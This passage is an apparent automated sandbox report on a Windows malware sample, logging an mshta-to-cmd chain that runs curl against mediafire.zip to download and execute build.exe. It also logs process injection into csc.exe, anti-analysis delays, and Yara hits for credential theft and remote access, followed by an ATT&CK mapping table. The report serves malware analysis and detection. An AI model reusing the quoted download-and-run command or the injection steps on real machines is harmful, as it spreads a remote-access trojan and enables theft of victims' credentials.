              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\build.exe build.exe
              Source: C:\Users\user\Desktop\build.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\build.exe build.exeJump to behavior
              Source: C:\Users\user\Desktop\build.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: k7rn7l32.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: ntd3ll.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: d3d9.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\build.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Binary string: D:\Sources\foobar2000-desktop-1.6.x\foobar2000\Release\foobar2000.pdb source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\build.exeUnpacked PE file: 5.2.build.exe.1060000.2.unpack
              Source: C:\Users\user\Desktop\build.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\build.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: build.exe.4.drStatic PE information: real checksum: 0x2536d9 should be: 0x308742
              Source: build.exe.4.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00593E24 push eax; ret 5_2_00593E42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_066397C7 pushad ; retf 9_2_066397C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_0AE46DC8 push eax; retf 9_2_0AE46DC9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_0AE49D8F push dword ptr [esp+ecx*2-75h]; ret 9_2_0AE49D93
              Source: C:\Windows\SysWOW64\curl.exeFile created: C:\Users\user\Desktop\build.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6A30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00427A40 rdtsc 5_2_00427A40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 967Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 8884Jump to behavior
              Source: C:\Users\user\Desktop\build.exeAPI coverage: 4.9 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7252Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7252Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7240Thread sleep count: 967 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7240Thread sleep count: 8884 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: csc.exe, 00000009.00000002.2973144757.0000000009074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
              Source: curl.exe, 00000004.00000003.1756430601.0000000002720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00427A40 rdtsc 5_2_00427A40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\build.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\build.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\build.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4800000Jump to behavior
              Source: C:\Users\user\Desktop\build.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4490008Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -L https://mediafire.zip/build.exe -o build.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\build.exe build.exeJump to behavior
              Source: C:\Users\user\Desktop\build.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00592716 cpuid 5_2_00592716
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00593435 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00593435
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_DT5aFgoH5h6bbtKq7QJump to behavior
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              311
              Process Injection
              1
              Masquerading
              11
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
